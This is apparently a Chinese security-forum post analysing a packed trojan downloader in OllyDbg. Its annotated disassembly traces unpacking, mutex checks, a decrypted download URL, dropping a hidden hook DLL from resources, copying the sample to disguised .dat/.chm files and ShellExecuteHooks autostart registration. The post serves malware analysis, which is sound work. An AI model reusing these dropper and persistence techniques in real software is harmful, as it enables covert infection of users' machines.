本帖最后由 是昔流芳 于 2011-2-11 12:21 编辑
程序加了壳: nSPack 3.7 -> North Star/Liu Xing Ping [Overlay]
OD载入后停在:
0041E37B > 9C pushfd
0041E37C 60 pushad
0041E37D E8 00000000 call down.0041E382
0041E382 5D pop ebp
0041E383 83ED 07 sub ebp,7
0041E386 8D8D 01FDFFFF lea ecx,dword ptr ss:[ebp-2FF]
0041E38C 8039 01 cmp byte ptr ds:[ecx],1
直接搜索 popad / popfd 序列,定位到壳的出口处:
0041E5E1 61 popad
0041E5E2 9D popfd
0041E5E3 B8 01000000 mov eax,1
0041E5E8 C2 0C00 retn 0C
0041E5EB 61 popad
0041E5EC 9D popfd
0041E5ED - E9 97DAFFFF jmp down.0041C089 //跳到 fOEP(假OEP),F7 跟进
进来看看,OEP 好像被动了手脚,像是一些 anti + 花指令:
0041C089 55 push ebp
0041C08A 8BEC mov ebp,esp
0041C08C 6A FF push -1
0041C08E 68 66666600 push 666666
0041C093 68 88888800 push 888888
0041C098 64:A1 00000000 mov eax,dword ptr fs:[0]
0041C09E 50 push eax
0041C09F 64:8925 0000000>mov dword ptr fs:[0],esp
0041C0A6 58 pop eax
0041C0A7 64:A3 00000000 mov dword ptr fs:[0],eax
0041C0AD 90 nop
0041C0AE 72 0C jb short down.0041C0BC
0041C0B0 73 0A jnb short down.0041C0BC
0041C0B2 90 nop
0041C0B3 90 nop
0041C0B4 90 nop
0041C0B5 90 nop
0041C0B6 72 10 jb short down.0041C0C8 //明显花指令
0041C0B8 73 0E jnb short down.0041C0C8
0041C0BA 0000 add byte ptr ds:[eax],al
0041C0BC 58 pop eax
0041C0BD 58 pop eax
0041C0BE 58 pop eax
0041C0BF 58 pop eax
0041C0C0 ^ 72 F0 jb short down.0041C0B2 //明显花指令
0041C0C2 ^ 73 EE jnb short down.0041C0B2
0041C0C4 0000 add byte ptr ds:[eax],al
0041C0C6 0000 add byte ptr ds:[eax],al
0041C0C8 90 nop
0041C0C9 90 nop
0041C0CA 50 push eax
0041C0CB 58 pop eax
0041C0CC 90 nop
0041C0CD 90 nop
0041C0CE 83C4 01 add esp,1
0041C0D1 90 nop
0041C0D2 90 nop
0041C0D3 90 nop
0041C0D4 83C4 FF add esp,-1
0041C0D7 90 nop
0041C0D8 ^ 0F82 76D8FEFF jb down.00409954 //明显花指令,跳向真正的OEP
0041C0DE ^ 0F83 70D8FEFF jnb down.00409954
00409954 55 push ebp ; OEP
00409955 8BEC mov ebp,esp
00409957 B9 0E000000 mov ecx,0E
0040995C 6A 00 /push 0
0040995E 6A 00 |push 0
00409960 49 |dec ecx
00409961 ^ 75 F9 \jnz short down.0040995C
00409963 51 push ecx
00409964 53 push ebx
00409965 56 push esi
004099A6 50 push eax
004099A7 8D45 DC lea eax,dword ptr ss:[ebp-24]
004099AA E8 E9B1FFFF call down.00404B98 ; F7进去溜达一下,获取分区的卷序列号(从下面堆栈看 VolumeNameBuffer=NULL、pVolumeSerialNumber 有效,取的是序列号而不是卷标)
004099AF 8B4D DC mov ecx,dword ptr ss:[ebp-24] ; ASCII "4634ED47")
004099B2 8D45 E0 lea eax,dword ptr ss:[ebp-20]
004099B5 BA A89D4000 mov edx,down.00409DA8 ; ASCII ":")
004099BA E8 B59CFFFF call down.00403674 ; 上面两个字符串连接
004099BF 8B45 E0 mov eax,dword ptr ss:[ebp-20] ; ":\4634ED47"
004099C2 8D55 E4 lea edx,dword ptr ss:[ebp-1C]
004099C5 E8 32A9FFFF call down.004042FC
004099CA 8B45 E4 mov eax,dword ptr ss:[ebp-1C] ; ":\4634ED47")
004099CD 5A pop edx
004099CE E8 3D9FFFFF call down.00403910
004099D3 85C0 test eax,eax
00404BD9 68 D04C4000 push down.00404CD0 ; ASCII "C:"
00404BDE E8 D9F4FFFF call down.004040BC ;跳到 kernel32.GetVolumeInformationA,看堆栈有详细的信息
00404BE3 8D4D F0 lea ecx,dword ptr ss:[ebp-10]
00404BE6 0FB745 FC movzx eax,word ptr ss:[ebp-4]
00404BEA BA 04000000 mov edx,4
00404BEF E8 ACF6FFFF call down.004042A0
00404BF4 8B45 F0 mov eax,dword ptr ss:[ebp-10] ; (ASCII "7ED4")
00404BF7 50 push eax
00404BF8 8B45 FC mov eax,dword ptr ss:[ebp-4]
00404BFB E8 8CF5FFFF call down.0040418C
00404C00 0FB7C0 movzx eax,ax
00404C03 8D4D EC lea ecx,dword ptr ss:[ebp-14]
00404C06 BA 04000000 mov edx,4
00404C0B E8 90F6FFFF call down.004042A0
00404C10 8B55 EC mov edx,dword ptr ss:[ebp-14] ; (ASCII "4463")
GetVolumeInformationA 调用时堆栈中的参数:
0012FED4 00404CD0 |RootPathName = "C:"
0012FED8 00000000 |VolumeNameBuffer = NULL
0012FEDC 00000000 |MaxVolumeNameSize = 0
0012FEE0 0012FF24 |pVolumeSerialNumber = 0012FF24
0012FEE4 0012FF20 |pMaxFilenameLength = 0012FF20
0012FEE8 0012FF1C |pFileSystemFlags = 0012FF1C
0012FEEC 00000000 |pFileSystemNameBuffer = NULL
0012FEF0 00000000 \pFileSystemNameSize = NULL
0012FEF4 0012FF34 指向下一个 SEH 记录的指针
004099F4 E8 8F9EFFFF call down.00403888
004099F9 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
004099FC 8D45 D8 lea eax,dword ptr ss:[ebp-28]
004099FF BA B49D4000 mov edx,down.00409DB4 ; ASCII "Explorer.exe "
00409A04 E8 6B9CFFFF call down.00403674
00409A09 8B45 D8 mov eax,dword ptr ss:[ebp-28]
00409A0C E8 179EFFFF call down.00403828
00409A11 50 push eax
00409A12 E8 25A7FFFF call down.0040413C ; jmp 到 kernel32.WinExec
00409A17 8D55 CC lea edx,dword ptr ss:[ebp-34]
00409A1A B8 01000000 mov eax,1
00409A1F E8 44AAFFFF call down.00404468 ; 获取自身路径,进去的话可以看到通过以下2个函数获得的
{
0040448C E8 F3FBFFFF call down.00404084 ; jmp 到 kernel32.GetModuleFileNameA
00404491 8BC8 mov ecx,eax
00404493 8BD4 mov edx,esp
00404495 8BC3 mov eax,ebx
00404497 E8 04F1FFFF call down.004035A0
0040449C EB 1E jmp short down.004044BC
0040449E E8 C9FBFFFF call down.0040406C ; jmp 到 kernel32.GetCommandLineA
}
00409A24 8B45 CC mov eax,dword ptr ss:[ebp-34]
00409A27 50 push eax
00409A28 8D45 C8 lea eax,dword ptr ss:[ebp-38]
00409A2B E8 68B1FFFF call down.00404B98 ; 获取卷标"4634ED47"
00409A30 8B55 C8 mov edx,dword ptr ss:[ebp-38] ; (ASCII "4634ED47")
00409A4F E8 38B3FFFF call down.00404D8C ; F7进去是获取系统目录
00409A54 8B45 C4 mov eax,dword ptr ss:[ebp-3C] ; "C:\WINDOWS\4634ED47.hlp")
00409A57 E8 CC9DFFFF call down.00403828
00409A5C 50 push eax ; inifilename"C:\WINDOWS\4634ED47.hlp")
00409A5D 6A 32 push 32
00409A5F 68 2CB74000 push down.0040B72C
00409A64 68 C49D4000 push down.00409DC4
00409A69 68 C89D4000 push down.00409DC8 ; ASCII "RC"
00409A6E 68 CC9D4000 push down.00409DCC ; ASCII "status"
00409A73 E8 1CA6FFFF call down.00404094 ; jmp 到 kernel32.GetPrivateProfileStringA,按上面的压栈顺序是读取 4634ED47.hlp 中 [status] 节的 RC 键(读配置,不是写入),开始有小动作了
00409AD7 8D45 B4 lea eax,dword ptr ss:[ebp-4C]
00409ADA E8 F5B1FFFF call down.00404CD4 ; 获取互斥体名字"E4634ED47"
00409ADF 8B45 B4 mov eax,dword ptr ss:[ebp-4C]
00409AE2 E8 419DFFFF call down.00403828 ; 是否成功
00409AE7 50 push eax ; /MutexName = "E4634ED47"
00409AE8 6A 00 push 0
00409AEA 68 01001F00 push 1F0001
00409AEF E8 00A6FFFF call down.004040F4 ; jmp 到 kernel32.OpenMutexA
00409AF4 85C0 test eax,eax
00409AF6 0F85 3E020000 jnz down.00409D3A ; 是否成功
00409AFC 8D45 B0 lea eax,dword ptr ss:[ebp-50]
00409AFF E8 2CB2FFFF call down.00404D30 ; 获取"D4634ED47"
00409B04 8B45 B0 mov eax,dword ptr ss:[ebp-50]
00409B07 E8 1C9DFFFF call down.00403828
00409B0C 50 push eax ; /MutexName = 上一步取得的字符串(00409AFF 处标注为 "D4634ED47",原注释写作 "E4634ED47",疑为笔误)
00409B0D 6A 00 push 0
00409B0F 68 01001F00 push 1F0001
00409B14 E8 DBA5FFFF call down.004040F4 ; jmp 到 kernel32.OpenMutexA
00409B19 85C0 test eax,eax
00409B1B 0F85 19020000 jnz down.00409D3A ; 是否成功
00409B21 8D45 AC lea eax,dword ptr ss:[ebp-54]
00409B24 E8 ABB1FFFF call down.00404CD4 ; 获取(ASCII "E4634ED47")
00409B29 8B45 AC mov eax,dword ptr ss:[ebp-54]
00409B43 E8 58B3FFFF call down.00404EA0 ; F7进去是获得GetWindowsDirectoryA
00409B48 8B55 A8 mov edx,dword ptr ss:[ebp-58] ; (ASCII "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00409B4B B8 18B74000 mov eax,down.0040B718
00409B50 E8 AF99FFFF call down.00403504
00409B55 8D45 A4 lea eax,dword ptr ss:[ebp-5C]
00409B58 E8 A7B2FFFF call down.00404E04
00409B5D 8B55 A4 mov edx,dword ptr ss:[ebp-5C] ; (ASCII "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll")
00409B60 B8 1CB74000 mov eax,down.0040B71C
00409B65 E8 9A99FFFF call down.00403504
00409B6A 8D45 A0 lea eax,dword ptr ss:[ebp-60]
00409B6D E8 06B8FFFF call down.00405378 ; F7进去是获得GetWindowsDirectoryA
00409B72 FF75 A0 push dword ptr ss:[ebp-60] ; C:\WINDOWS
00409B75 68 F89D4000 push down.00409DF8 ; ASCII "Help"
00409B7A 8D45 9C lea eax,dword ptr ss:[ebp-64]
00409B7D E8 16B0FFFF call down.00404B98 ; 获取"4634ED47")
00409B82 FF75 9C push dword ptr ss:[ebp-64]
00409B85 68 089E4000 push down.00409E08 ; ASCII ".chm"
00405831 . 8B45 FC mov eax,dword ptr ss:[ebp-4]
00405834 . E8 EFDFFFFF call down.00403828
00405839 . 50 push eax ; |FileName
0040583A . E8 D5E7FFFF call down.00404014 ; \CreateFileA
0040583F . 8BF0 mov esi,eax
00405841 . 83FE FF cmp esi,-1
00405844 . 75 0D jnz short down.00405853
00405846 . 33C0 xor eax,eax
00405848 . 5A pop edx
00405849 . 59 pop ecx
0040584A . 59 pop ecx
0040584B . 64:8910 mov dword ptr fs:[eax],edx
0040584E . E9 B4020000 jmp down.00405B07
00405853 > 6A 02 push 2 ; /Origin = FILE_END
00405855 . 6A 00 push 0 ; |pOffsetHi = NULL
00405857 . 6A FD push -3 ; |OffsetLo = FFFFFFFD (-3.)
00405859 . 56 push esi ; |hFile
0040585A . E8 BDE8FFFF call down.0040411C ; \SetFilePointer
0040585F . 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00405862 . BA 03000000 mov edx,3
00405867 . E8 ECE0FFFF call down.00403958
0040586C . 6A 00 push 0
0040586E . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00405871 . 50 push eax
00405872 . 6A 03 push 3
00405874 . 8D45 F0 lea eax,dword ptr ss:[ebp-10]
00405877 . E8 04E0FFFF call down.00403880
0040587C . 50 push eax ; |Buffer
0040587D . 56 push esi ; |hFile
0040587E . E8 81E8FFFF call down.00404104 ; \ReadFile
00405883 . 8B45 F0 mov eax,dword ptr ss:[ebp-10]
00405886 . BA 405B4000 mov edx,down.00405B40 ; ASCII "CNN"
0040588B . E8 E4DEFFFF call down.00403774
00405890 . 0F85 57020000 jnz down.00405AED
00405896 . 6A 02 push 2 ; /Origin = FILE_END
00405898 . 6A 00 push 0 ; |pOffsetHi = NULL
0040589A . 6A F8 push -8 ; |OffsetLo = FFFFFFF8 (-8.)
0040589C . 56 push esi ; |hFile
0040589D . E8 7AE8FFFF call down.0040411C ; \SetFilePointer
004058A2 . 8D45 EC lea eax,dword ptr ss:[ebp-14]
004058A5 . BA 05000000 mov edx,5
004058AA . E8 A9E0FFFF call down.00403958
004058AF . 6A 00 push 0
004058B1 . 8D45 F8 lea eax,dword ptr ss:[ebp-8]
004058B4 . 50 push eax
004058B5 . 6A 05 push 5
004058B7 . 8D45 EC lea eax,dword ptr ss:[ebp-14]
004058BA . E8 C1DFFFFF call down.00403880
004058BF . 50 push eax ; |Buffer
004058C0 . 56 push esi ; |hFile
004058C1 . E8 3EE8FFFF call down.00404104 ; \ReadFile
004058C6 . 8B45 EC mov eax,dword ptr ss:[ebp-14]
004058C9 . E8 4AE9FFFF call down.00404218
004058CE . 8BD8 mov ebx,eax
004058D0 . 6A 02 push 2 ; /Origin = FILE_END
004058D2 . 6A 00 push 0 ; |pOffsetHi = NULL
004058D4 . B8 F8FFFFFF mov eax,-8 ; |
004058D9 . 2BC3 sub eax,ebx ; |
004058DB . 50 push eax ; |OffsetLo
004058DC . 56 push esi ; |hFile
004058DD . E8 3AE8FFFF call down.0040411C ; \SetFilePointer
004058E2 . 8D45 F4 lea eax,dword ptr ss:[ebp-C]
00405905 . 8B45 F4 mov eax,dword ptr ss:[ebp-C] ; 密钥key
00405908 . E8 87F0FFFF call down.00404994 ; F7 进去是解密有兴趣的可以跟进溜达溜达,我跟累了。。
0040590D . 8B55 E8 mov edx,dword ptr ss:[ebp-18]
00405910 . 8D45 F4 lea eax,dword ptr ss:[ebp-C]
00405913 . E8 30DCFFFF call down.00403548
00405918 . 8BC7 mov eax,edi
0040591A . 8B55 F4 mov edx,dword ptr ss:[ebp-C] ; 解密的地址出来了我就不贴图了。。
0040591D . E8 E2DBFFFF call down.00403504
00405922 . 8B55 F4 mov edx,dword ptr ss:[ebp-C]
00405925 . B8 4C5B4000 mov eax,down.00405B4C
0040592A . E8 E1DFFFFF call down.00403910
0040592F . 8BD8 mov ebx,eax
00405931 . 68 78B64000 push down.0040B678
00405936 . 8BCB mov ecx,ebx
00405938 . 49 dec ecx
00405939 . BA 01000000 mov edx,1
0040593E . 8B45 F4 mov eax,dword ptr ss:[ebp-C] ; 解密的地址出来了。。
00409BAE |. 8B55 98 mov edx,[local.26] ; "http://127.0.0.1/1.exe^^^^^1^1^1^4634ED47^")
00409BB1 |. B8 24B74000 mov eax,down.0040B724
00409BB6 |. E8 4999FFFF call down.00403504
00409BBB |. 8D45 90 lea eax,[local.28]
00409BBE |. E8 D5AFFFFF call down.00404B98 ; 继续获取 卷标"4634ED47"
00409BC3 |. 8B55 90 mov edx,[local.28]
00409BC6 |. B8 60B74000 mov eax,down.0040B760
00409BD5 |. E8 4E9CFFFF call down.00403828 ; 获取"C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll
00409BDA |. 8BD8 mov ebx,eax
00409BDC |. 53 push ebx ; /filename="C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll")
00409BDD |. E8 9AA4FFFF call down.0040407C ; \GetFileAttributesA
00409BE2 |. 83F8 FF cmp eax,-1
00409BE5 |. 74 0E je short down.00409BF5
00409BE7 |. 6A 00 push 0 ; /FileAttributes = 0
00409BE9 |. 53 push ebx ; |FileName
00409BEA |. E8 25A5FFFF call down.00404114 ; \SetFileAttributesA
00409BEF |. 53 push ebx ; /FileName
00409BF0 |. E8 57A4FFFF call down.0040404C ; \DeleteFileA
00409BF5 |> A1 24B74000 mov eax,dword ptr ds:[40B724]
00409BFA |. 50 push eax
00409BFB |. 6A 01 push 1
00409BFD |. 8BCB mov ecx,ebx
00409BFF |. BA 109E4000 mov edx,down.00409E10 ; ASCII "DATEINFO"
00409C04 |. B8 0A000000 mov eax,0A
00409C09 |. E8 4EBFFFFF call down.00405B5C ; F7进去有动作了,用 FindResourceA/LoadResource/SizeofResource/WriteFile 从自身资源里释放出 4634ED47.dll(见下面花括号内)
{
00405B8D |. 56 push esi ; /ResourceType
00405B8E |. 57 push edi ; |ResourceName
00405B8F |. A1 50B64000 mov eax,dword ptr ds:[40B650] ; |
00405B94 |. 50 push eax ; |hModule => 00400000 (down)
00405B95 |. E8 C2E4FFFF call down.0040405C ; \FindResourceA
00405B9A |. 8BF0 mov esi,eax
00405B9C |. 85F6 test esi,esi
00405B9E |. 0F84 A7010000 je down.00405D4B
00405BA4 |. 56 push esi ; /hResource
00405BA5 |. A1 50B64000 mov eax,dword ptr ds:[40B650] ; |
00405BAA |. 50 push eax ; |hModule => 00400000 (down)
00405BAB |. E8 24E5FFFF call down.004040D4 ; \LoadResource
00405BB0 |. 8BF8 mov edi,eax
00405BB2 |. 85FF test edi,edi
00405BB4 |. 0F84 91010000 je down.00405D4B
00405BBA |. 57 push edi ; /nHandles
00405BBB |. E8 1CE5FFFF call down.004040DC ; \SetHandleCount
00405BC0 |. 8945 F4 mov [local.3],eax
00405BC3 |. 837D F4 00 cmp [local.3],0
00405BC7 |. 0F84 7E010000 je down.00405D4B
00405BCD |. 807D 08 01 cmp byte ptr ss:[ebp+8],1
00405BD1 |. 75 19 jnz short down.00405BEC
00405BD3 |. 6A 00 push 0 ; /hTemplateFile = NULL
00405BD5 |. 6A 06 push 6 ; |Attributes = HIDDEN|SYSTEM
00405BD7 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00405BD9 |. 6A 00 push 0 ; |pSecurity = NULL
00405BDB |. 6A 00 push 0 ; |ShareMode = 0
00405BDD |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00405BE2 |. 53 push ebx ; |FileName
00405BE3 |. E8 2CE4FFFF call down.00404014 ; \CreateFileA
00405BE8 |. 8BD8 mov ebx,eax
00405BEA |. EB 17 jmp short down.00405C03
00405BEC |> 6A 00 push 0 ; /hTemplateFile = NULL
00405BEE |. 6A 00 push 0 ; |Attributes = 0
00405BF0 |. 6A 02 push 2 ; |Mode = CREATE_ALWAYS
00405BF2 |. 6A 00 push 0 ; |pSecurity = NULL
00405BF4 |. 6A 00 push 0 ; |ShareMode = 0
00405BF6 |. 68 000000C0 push C0000000 ; |Access = GENERIC_READ|GENERIC_WRITE
00405BFB |. 53 push ebx ; |FileName
00405BFC |. E8 13E4FFFF call down.00404014 ; \CreateFileA
00405C01 |. 8BD8 mov ebx,eax
00405C03 |> 83FB FF cmp ebx,-1
00405C06 |. 0F84 3F010000 je down.00405D4B
00405C0C |. 56 push esi ; /hResource
00405C0D |. A1 50B64000 mov eax,dword ptr ds:[40B650] ; |
00405C12 |. 50 push eax ; |hModule => 00400000 (down)
00405C13 |. E8 0CE5FFFF call down.00404124 ; \SizeofResource
00405C18 |. 8BF0 mov esi,eax
00405C1A |. 6A 00 push 0
00405C1C |. 8D45 F8 lea eax,[local.2]
00405C1F |. 50 push eax
00405C20 |> 56 push esi ; |nBytesToWrite
00405C21 |. 8B45 F4 mov eax,[local.3] ; |
00405C24 |. 50 push eax ; |Buffer
00405C25 |. 53 push ebx ; |hFile
00405C26 |. E8 19E5FFFF call down.00404144 ; \WriteFile
}
00409C0E |. 6A 07 push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00409C10 |. 53 push ebx ; |FILENAME=e"C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll")
00409C11 |. E8 FEA4FFFF call down.00404114 ; \SetFileAttributesA
00409C16 |. A1 18B74000 mov eax,dword ptr ds:[40B718]
00409C1B |. E8 089CFFFF call down.00403828
00409C20 |. 8BF0 mov esi,eax ; "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00409C22 |. 56 push esi ; /FileName
00409C23 |. E8 54A4FFFF call down.0040407C ; \GetFileAttributesA
00409C43 |. E8 20A8FFFF call down.00404468 ; 获取自身路径
00409C48 |. 8B45 8C mov eax,[local.29]
00409C4B |. E8 D89BFFFF call down.00403828
00409C50 |. 50 push eax ; |existingfilename=C:\Documents and Settings\Administrator\桌面\down.exe
00409C51 |. E8 B6A3FFFF call down.0040400C ; \CopyFileA 调用复制自身到C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat
00409C56 |. 6A 07 push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM 文件属性值
00409C58 |. 56 push esi ; |FileName
00409C59 |. E8 B6A4FFFF call down.00404114 ; \SetFileAttributesA 设置文件属性
00409C5E |. A1 20B74000 mov eax,dword ptr ds:[40B720]
00409C63 |. E8 C09BFFFF call down.00403828
00409C68 |. 8BF8 mov edi,eax
00409C6A |. 57 push edi ; /FileName
00409C6B |. E8 0CA4FFFF call down.0040407C ; \GetFileAttributesA 获得文件属性
00409C70 |. 83F8 FF cmp eax,-1 ; 判断 GetFileAttributesA 是否返回 -1(INVALID_FILE_ATTRIBUTES,文件不存在)
00409C73 |. 74 0E je short down.00409C83
00409C75 |. 6A 00 push 0 ; /FileAttributes = 0
00409C77 |. 57 push edi ; |filename="C:\WINDOWS\Help\4634ED47.chm")
00409C78 |. E8 97A4FFFF call down.00404114 ; \SetFileAttributesA 设置文件属性
00409C7D |. 57 push edi ; /FileName
00409C7E |. E8 C9A3FFFF call down.0040404C ; \DeleteFileA
00409C83 |> 6A FF push -1 ; /FailIfExists = TRUE
00409C85 |. 57 push edi ; |newfilename="C:\WINDOWS\Help\4634ED47.chm")
00409C86 |. 56 push esi ; |existingfilename="C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dat")
00409C87 |. E8 80A3FFFF call down.0040400C ; \CopyFileA 复制这么多。。。(把 .dat 再复制一份为 C:\WINDOWS\Help\4634ED47.chm)
00409C8C |. 6A 07 push 7 ; /FileAttributes = READONLY|HIDDEN|SYSTEM
00409C8E |. 57 push edi ; |filename="C:\WINDOWS\Help\4634ED47.chm")
00409C8F |. E8 80A4FFFF call down.00404114 ; \SetFileAttributesA
00409C94 |. 53 push ebx ; /filename= C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll
00409C95 |. E8 32A4FFFF call down.004040CC ; \LoadLibraryA 加载刚释放出来的 4634ED47.dll(hook 模块,下面用 GetProcAddress 取它导出的 JumpHookOn/JumpHookOff)
00409C9A 8BD8 mov ebx,eax
00409C9C 85DB test ebx,ebx
00409C9E 75 07 jnz short down.00409CA7 ; 判断是否加载成功,不成功就退出
00409CA0 6A 00 push 0
00409CA2 E8 ADA3FFFF call down.00404054 ; jmp 到 kernel32.ExitProcess
00409CA7 |> \68 1C9E4000 push down.00409E1C ; //ProcNameOrOrdinal = "JumpHookOn"
00409CAC |. 53 push ebx ; |hModule
00409CAD |. E8 EAA3FFFF call down.0040409C ; \GetProcAddress
00409CB2 |. 89C6 mov esi,eax ; (4634ED47.JumpHookOn)
00409CB4 |. B8 64B74000 mov eax,down.0040B764
00409CB9 |. BA 309E4000 mov edx,down.00409E30 ; ASCII "||||||||||||||||||"
00409CBE |. E8 4198FFFF call down.00403504
00409CC3 |. B8 64B74000 mov eax,down.0040B764
00409CC8 |. BA 4C9E4000 mov edx,down.00409E4C ; ASCII "__________________"
00409CCD |. E8 3298FFFF call down.00403504
00409CD2 |. B8 64B74000 mov eax,down.0040B764
00409CD7 |. BA 689E4000 mov edx,down.00409E68 ; ASCII " "
00409CDC |. E8 2398FFFF call down.00403504
00409CE1 |. 68 909E4000 push down.00409E90 ; //ProcNameOrOrdinal = "JumpHookOff"
00409CE6 |. 53 push ebx ; |hModule
00409CE7 |. E8 B0A3FFFF call down.0040409C ; \GetProcAddress
00409CEC |. A3 28B74000 mov dword ptr ds:[40B728>; (4634ED47.JumpHookOff)
00409CF1 |. FFD6 call esi ; esi = 上面 GetProcAddress 取得的 4634ED47.JumpHookOn,作者注其内部调用 SetWindowsHookExA(DLL 内部代码本帖未贴出)
00409CF3 |. 68 10B74000 push down.0040B710 ; /pThreadId = down.0040B710
00409CF8 |. 6A 00 push 0 ; |CreationFlags = 0
00409CFA |. 6A 01 push 1 ; |pThreadParm = 00000001
00409CFC |. 68 CC964000 push down.004096CC ; |ThreadFunction = down.004096CC
00409D01 |. 6A 00 push 0 ; |StackSize = 0
00409D03 |. 6A 00 push 0 ; |pSecurity = NULL
00409D05 |. E8 3AA3FFFF call down.00404044 ; \CreateThread
00409D0A |. EB 14 jmp short down.00409D20
00409D0C |> 68 F4B64000 /push down.0040B6F4 ; /pMsg = WM_NULL
00409D11 |. E8 6EA4FFFF |call down.00404184 ; \TranslateMessage 要处理的消息
00409D16 |. 68 F4B64000 |push down.0040B6F4 ; /pMsg = WM_NULL
00409D1B |. E8 3CA4FFFF |call down.0040415C ; \DispatchMessageA
00409D20 |> 6A 00 push 0 ; /MsgFilterMax = 0
00409D22 |. 6A 00 |push 0 ; |MsgFilterMin = 0
00409D24 |. 6A 00 |push 0 ; |hWnd = NULL
00409D26 |. 68 F4B64000 |push down.0040B6F4 ; |pMsg = down.0040B6F4
00409D2B |. E8 3CA4FFFF |call down.0040416C ; \GetMessageA
00404E32 E8 8DF2FFFF call down.004040C4 ; jmp 到 kernel32.GetWindowsDirectoryA
00404E37 8D45 FC lea eax,dword ptr ss:[ebp-4]
00404E3A 8B13 mov edx,dword ptr ds:[ebx]
00404E3C 8A12 mov dl,byte ptr ds:[edx]
00404E3E E8 8DE7FFFF call down.004035D0
00404E43 FF75 FC push dword ptr ss:[ebp-4]
00404E46 FF35 ACA04000 push dword ptr ds:[40A0AC] ; ASCII ":\Program Files\Common Files\Microsoft Shared\MSINFO"
00404E4C 8D45 F8 lea eax,dword ptr ss:[ebp-8]
00404E4F E8 44FDFFFF call down.00404B98
00404E54 FF75 F8 push dword ptr ss:[ebp-8] ; (ASCII "4634ED47")
00404E57 68 984E4000 push down.00404E98 ; ASCII ".dll"
00404E5C 8BC3 mov eax,ebx
00404E5E BA 04000000 mov edx,4
00404E63 E8 80E8FFFF call down.004036E8 ; F7 进去瞧瞧,是一个循环拼接多段字符串的函数(edx 为要拼接的段数),拼出完整路径
0040373E 8B449C 18 mov eax,dword ptr ss:[esp+ebx*4+18]
00403742 89F2 mov edx,esi
00403744 85C0 test eax,eax
00403746 74 0A je short down.00403752
00403748 8B48 FC mov ecx,dword ptr ds:[eax-4]
0040374B 01CE add esi,ecx
0040374D E8 5EEEFFFF call down.004025B0
00403752 4B dec ebx
00403753 ^ 75 E9 jnz short down.0040373E ; 循环获取 ASCII "C:\Program Files\Common Files\Microsoft Shared\MSINFO\4634ED47.dll"
00408B8B |. B8 148E4000 mov eax,down.00408E14 ; ASCII "Explorer.Exe"
00408B90 |. E8 BFE9FFFF call down.00407554 ; F7 进去有东西:下面 004075BD 处是一个按进程名遍历进程的循环
00408B95 |. B8 2C8E4000 mov eax,down.00408E2C ; ASCII "TIMPlatform.exe"
00408B9A |. E8 B5E9FFFF call down.00407554 ; 和上面的call一样
00408B9F |. 6A 00 push 0 ; /lParam = 0
00408BA1 |. 6A 00 push 0 ; |wParam = 0
00408BA3 |. 6A 1A push 1A ; |Message = WM_WININICHANGE
00408BA5 |. 68 FFFF0000 push 0FFFF ; |hWnd = HWND_BROADCAST
00408BAA |. E8 C5B5FFFF call down.00404174 ; \PostMessageA
004075BD |> /8D95 D0FEFFFF /lea edx,[local.76]
004075C3 |. |8B45 FC |mov eax,[local.1]
004075C6 |. |E8 31CDFFFF |call down.004042FC
004075CB |. |8B85 D0FEFFFF |mov eax,[local.76]
004075D1 |. |50 |push eax
004075D2 |. |8D85 C4FEFFFF |lea eax,[local.79]
004075D8 |. |8D56 24 |lea edx,dword ptr ds:[esi+24]
004075DB |. |B9 04010000 |mov ecx,104
004075E0 |. |E8 2BC0FFFF |call down.00403610
004075E5 |. |8B85 C4FEFFFF |mov eax,[local.79]
004075EB |. |8D95 C8FEFFFF |lea edx,[local.78]
004075F1 |. |E8 AEDAFFFF |call down.004050A4
004075F6 |. |8B85 C8FEFFFF |mov eax,[local.78]
004075FC |. |8D95 CCFEFFFF |lea edx,[local.77]
00407602 |. |E8 F5CCFFFF |call down.004042FC
00407607 |. |8B85 CCFEFFFF |mov eax,[local.77]
0040760D |. |5A |pop edx
0040760E |. |E8 FDC2FFFF |call down.00403910
00407613 |. |85C0 |test eax,eax
00407615 |. |7E 08 |jle short down.0040761F
00407617 |. |8B46 08 |mov eax,dword ptr ds:[esi+8]
0040761A |. |E8 15FFFFFF |call down.00407534
0040761F |> |8BD6 |mov edx,esi
00407621 |. |8BC3 |mov eax,ebx
00407623 |. |E8 78EAFFFF |call down.004060A0
00407628 |. |83F8 01 |cmp eax,1
0040762B |. |1BC0 |sbb eax,eax
0040762D |. |40 |inc eax
0040762E |> |84C0 test al,al
00407630 |.^\75 8B \jnz short down.004075BD ; 循环遍历进程
00408B9F |. 6A 00 push 0 ; /lParam = 0
00408BA1 |. 6A 00 push 0 ; |wParam = 0
00408BA3 |. 6A 1A push 1A ; |Message = WM_WININICHANGE
00408BA5 |. 68 FFFF0000 push 0FFFF ; |hWnd = HWND_BROADCAST
00408BAA |. E8 C5B5FFFF call down.00404174 ; \PostMessageA
00408BAF |. B8 3C8E4000 mov eax,down.00408E3C
00408BB4 |. 33D2 xor edx,edx
00408BB6 |. E8 29C5FFFF call down.004050E4 ; F7 注册表相关,创建自启动(涉及 HKLM\...\Explorer\ShellExecuteHooks 和 HKCR\CLSID\{4ED44634-...}\InProcServer32,见下面)
00405216 |. 8BD0 mov edx,eax ; "SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks"
00405218 |. B8 02000080 mov eax,80000002
0040521D |. 59 pop ecx
0040521E |. E8 F9F2FFFF call down.0040451C
00405223 |. 68 24534000 push down.00405324
00405228 |. 68 30534000 push down.00405330 ; ASCII "CLSID"
0040522D |. FF75 F8 push [local.2]
00405230 |. 68 40534000 push down.00405340 ; ASCII "\InProcServer32"
00405235 |. 8D45 E0 lea eax,[local.8]
